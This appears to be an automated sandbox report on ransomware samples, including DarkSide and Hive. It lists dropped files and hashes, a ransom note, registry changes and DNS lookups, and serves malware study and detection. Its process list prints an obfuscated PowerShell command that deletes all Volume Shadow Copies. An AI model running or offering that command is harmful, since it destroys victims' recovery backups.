timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
Network
Files
memory/4004-0-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat
| MD5 | 6358d970c3edccb57eae7dbf9f42d58f |
| SHA1 | 25b994c3b5604f4f67e1ac6250bc2f14ce690380 |
| SHA256 | 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50 |
| SHA512 | 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131 |
C:\$Recycle.Bin\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini
| MD5 | f66bd8c4a0c3f208d38e64628d9a329d |
| SHA1 | 42b37f09b12463003ad23b3aa0e68c77d0aef3f8 |
| SHA256 | 4bd462a2312dabd402bbeb87bf13e933ac47284ff027d547cf46fdab7e13791b |
| SHA512 | fec4fc2f2a91f04ab87225020f12f2bddc1a0316a482d041999b6293e8e4ca0f8ce6b9a0dbaae61089c2a5909ef0ef5e27a51c7912fb1b3318b6aad950e9e4d7 |
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat
| MD5 | df5552357692e0cba5e69f8fbf06abb6 |
| SHA1 | 4714f1e6bb75a80a8faf69434726d176b70d7bd8 |
| SHA256 | d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8 |
| SHA512 | a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d |
memory/4004-865-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-2733-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-3489-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-4232-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-4981-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-6249-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-9141-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-9907-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.P7EsMTWem2f4DapaPblE9Dlz_RIz8E18M8Wn___Y6AI.hive
| MD5 | 9e95c9286aa916de80a68960ed66b52d |
| SHA1 | f2f8c6fd0ea28bca1a63cd2594afc3942b416c3f |
| SHA256 | 08ceabcb4f55ab059a42a4588e67b9aac327e3fe45047927a1fa7b30861a0576 |
| SHA512 | 1884c4398cbd4f7300ca03a25b1fcc814a8d2809dd438409ac9e2d1ca764569e55c6bfc60235949dade710ce0549fcbf41b929179f677219e076a895fd8d5db1 |
memory/4004-11851-0x0000000000F10000-0x00000000011E9000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat
| MD5 | c9c0dfee4ea69bbc4edbbd1684c97f7d |
| SHA1 | 1fb65f2c4b44b8c8795a8f3b7303137869d4a132 |
| SHA256 | dc7ada2e6705249f64ee7a50ad5c268ea469a38d691d05b32991ca3bb426d380 |
| SHA512 | a4c6b4bd7c21b9e54feb21e8fbf62debd93c9eb41da683156d11a24e93283e14628160780b6130df5e27704d8a5ec0bd87244d2e03c8cb735fd7809749abe5f5 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648406469969338.txt
| MD5 | ecaea544af9da1114077b951d8cb520d |
| SHA1 | 5820b2d71e7b2543cf1804eb91716c4e9f732fde |
| SHA256 | 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6 |
| SHA512 | dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919 |
memory/4004-11876-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-11877-0x0000000000F10000-0x00000000011E9000-memory.dmp
F:\$RECYCLE.BIN\HOW_TO_DECRYPT.txt
| MD5 | ee4ad142674725d6d9b58c9c3bb836dc |
| SHA1 | ac9bac37131c72a549d2bf3fbd233061906d5fab |
| SHA256 | fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776 |
| SHA512 | a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3 |
memory/4004-18145-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-21786-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23184-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23189-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23196-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23203-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23211-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23216-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23223-0x0000000000F10000-0x00000000011E9000-memory.dmp
memory/4004-23268-0x0000000000F10000-0x00000000011E9000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1695s
Max time network
1156s
Command Line
Signatures
DarkSide
Renames multiple (133) files with added filename extension
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\5a727a6e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\5a727a6e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5a727a6e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.5a727a6e\ = "5a727a6e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\5a727a6e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2504 wrote to memory of 3656 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
